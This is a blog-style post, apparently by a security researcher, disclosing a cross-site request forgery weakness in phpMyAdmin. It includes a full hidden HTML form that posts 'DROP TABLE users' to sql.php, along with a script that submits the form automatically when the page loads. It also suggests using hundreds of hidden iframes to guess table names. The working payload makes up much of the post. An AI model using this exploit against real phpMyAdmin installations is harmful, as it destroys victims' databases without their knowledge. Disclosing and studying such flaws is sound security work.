OK I could not resist to post this.
I played around with PhpMyAdmin a moment ago, and I never gave it much thought since it bores me too quickly. But this is kind of interesting. I have two different instances of PhpMyAdmin running for testing purposes. it is interesting to see that almost nobody understand CSRF and it's capabilities including those PhpMyAdmin developers. I mean this stuff is hilarious, first of when you sign-in to PhpMyAdmin it looks like it sets a token because it says:
foo.php?token=md5thingy
secure right?
Well, I am not sure what they are doing there, but removing the token doesn't make any difference. it just continues to work. So I emptied the cookie, well to no avail I am still logged into it. This means it uses a plain PHP session, this way it's vulnerable to CSRF and I can do anything at will if someone visits my special webpage and is still logged into PhpMyAdmin.
But of course, it gets worse.
How about truncating a table, or just drop a table through CSRF? it only requires the victim to be logged into his PhpMyadmin or still sits in the 24 minute PHP session timezone. We can craft a special page that submits itself in an Iframe. But the most shocking thing is that PhpMyAdmin sets the query to truncate a table inside a form field. This is done this way:
<input type="hidden" value="TRUNCATE+TABLE+`test`" name="sql_query"/>
Ugh.
So this means I can add anything I like there? of course we can:
<form method="post" action="http://www.example.com/phpMyAdmin/sql.php"/>
<input type="hidden" value="en-utf-8" name="lang"/>
<input type="hidden" value="1" name="server"/>
<input type="hidden" value="utf8_general_ci" name="collation_connection"/>
<input type="hidden" value="w0rdpr3ss" name="db"/>
<input type="hidden" value="users" name="table"/>
<input type="hidden" value="DROP+TABLE+`users`" name="sql_query"/>
<input type="hidden" value="Table has been emptied" name="zero_rows"/>
<input type="hidden" value="tbl_properties_structure.php" name="goto"/>
<input type="hidden" value="tbl_properties_structure.php" name="back"/>
<input type="hidden" value="0" name="reload"/>
<input type="hidden" value="" name="purge"/>
<input type="hidden" value="" name="cpurge"/>
<input type="hidden" value="" name="purgekey"/>
<input type="hidden" value="" name="show_query"/>
<input id="buttonYes" type="submit" value="Yes" name="btnDrop"/>
<input id="buttonNo" type="submit" value="No" name="btnDrop"/>
</form>
<script>document.getElementById('buttonYes').submit();</script>
Since a standard PHP session usually last 24 minutes, attackers can hack anyone even after you close your PhpMyAdmin session. Much more is possible, and probably very fancy stuff. Yes, you need to know the table name in order to pull this off, but how about making 200 hidden Iframes in our victim page that guesses the table names? or just reload the Iframe with different table names for about 5 minutes if you do not know the table name? I am sure that one will be the right one! and I would not be surprised if you could use GET also :)
